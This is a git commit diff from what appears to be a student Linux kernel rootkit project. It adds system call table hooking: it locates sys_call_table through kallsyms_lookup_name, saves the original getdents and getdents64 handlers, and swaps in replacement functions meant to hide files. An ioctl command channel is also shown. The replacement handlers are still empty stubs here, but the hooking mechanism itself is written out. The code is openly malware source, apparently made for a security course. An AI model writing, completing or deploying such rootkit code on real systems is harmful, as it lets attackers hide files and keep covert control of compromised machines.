commit 79eae0f0a870cee54edc4949948d22d7ea3bd723
parent f0ceea2cc8462d376accbb37c76f77721c81376d
Author: deurzen <m.deurzen@tum.de>
Date: Sat, 21 Nov 2020 15:23:35 +0100
adds initial system call table hooking functionality
Diffstat:
7 files changed, 42 insertions(+), 23 deletions(-)
diff --git a/src/filehide.c b/src/filehide.c
@@ -1,19 +1,28 @@
#include "filehide.h"
#include "hook.h"
+long
+g7_getdents(unsigned fd, struct linux_dirent __user *dirp, unsigned count)
+{
-long (*sys_getdents)(unsigned int, struct linux_dirent *, unsigned int);
-long (*sys_getdents64)(unsigned int, struct linux_dirent64 *, unsigned int);
+}
+long
+g7_getdents64(unsigned fd, struct linux_dirent64 __user *dirp, unsigned count)
+{
+
+}
void
hide_files(void)
{
-
+ sys_call_table[__NR_getdents] = (long *)g7_getdents;
+ sys_call_table[__NR_getdents64] = (long *)g7_getdents64;
}
void
unhide_files(void)
{
-
+ sys_call_table[__NR_getdents] = (long *)sys_getdents;
+ sys_call_table[__NR_getdents64] = (long *)sys_getdents64;
}
diff --git a/src/filehide.h b/src/filehide.h
@@ -6,15 +6,8 @@
#include <linux/syscalls.h>
-struct g7_linux_dirent {
- u64 d_ino;
- s64 d_off;
- unsigned short d_reclen;
- char d_name[];
-};
-
-long g7_getdents(unsigned int, struct linux_dirent __user *, unsigned int);
-long g7_getdents64(unsigned int, struct linux_dirent64 __user *, unsigned int);
+long g7_getdents(unsigned, struct linux_dirent __user *, unsigned);
+long g7_getdents64(unsigned, struct linux_dirent64 __user *, unsigned);
void hide_files(void);
void unhide_files(void);
diff --git a/src/g7.c b/src/g7.c
@@ -22,7 +22,7 @@ static int g7_open(struct inode *, struct file *);
static int g7_release(struct inode *, struct file *);
static ssize_t g7_read(struct file *, char __user *, size_t, loff_t *);
static ssize_t g7_write(struct file *, const char *, size_t, loff_t *);
-static long g7_ioctl(struct file *, unsigned int, unsigned long);
+static long g7_ioctl(struct file *, unsigned, unsigned long);
static struct mutex lock;
@@ -75,7 +75,7 @@ g7_write(struct file *file, const char __user *buf, size_t len, loff_t *off)
}
static long
-g7_ioctl(struct file *_file, unsigned int cmd, unsigned long arg)
+g7_ioctl(struct file *_file, unsigned cmd, unsigned long arg)
{
channel_t c = detect_channel(cmd);
DEBUG_NOTICE("[g7_ioctl] on %#10x (%s)\n", cmd, c.name);
diff --git a/src/hook.c b/src/hook.c
@@ -3,19 +3,28 @@
#include "hook.h"
-unsigned long *sys_call_table;
+void **sys_call_table;
+
+long (*sys_getdents)(unsigned, struct linux_dirent *, unsigned);
+long (*sys_getdents64)(unsigned, struct linux_dirent64 *, unsigned);
+
int
retrieve_sys_call_table(void)
{
+ return NULL != (sys_call_table
+ = (void **)kallsyms_lookup_name("sys_call_table"));
+}
+
+void
+init_hooks(void)
+{
disable_protection();
- int ret = !(sys_call_table
- = (unsigned long *)kallsyms_lookup_name("sys_call_table"));
+ sys_getdents = (void *)sys_call_table[__NR_getdents];
+ sys_getdents64 = (void *)sys_call_table[__NR_getdents64];
enable_protection();
-
- return ret;
}
void
diff --git a/src/hook.h b/src/hook.h
@@ -1,9 +1,17 @@
#ifndef _GROUP7_HOOK_H
#define _GROUP7_HOOK_H
-extern unsigned long *sys_call_table;
+#include <linux/types.h>
+#include <linux/dirent.h>
+#include <linux/syscalls.h>
+
+extern void **sys_call_table;
+
+extern long (*sys_getdents)(unsigned, struct linux_dirent *, unsigned);
+extern long (*sys_getdents64)(unsigned, struct linux_dirent64 *, unsigned);
int retrieve_sys_call_table(void);
+void init_hooks(void);
void disable_protection(void);
void enable_protection(void);
diff --git a/src/ioctl.c b/src/ioctl.c
@@ -24,7 +24,7 @@ report_channels(void)
}
channel_t
-detect_channel(unsigned int cmd)
+detect_channel(unsigned cmd)
{
switch (cmd) {
case G7_PING: return (channel_t){ "PING", handle_ping };
diff --git a/src/ioctl.h b/src/ioctl.h
@@ -16,7 +16,7 @@ typedef struct {
} channel_t;
void report_channels(void);
-channel_t detect_channel(unsigned int);
+channel_t detect_channel(unsigned);
// handlers
int handle_ping(unsigned long);
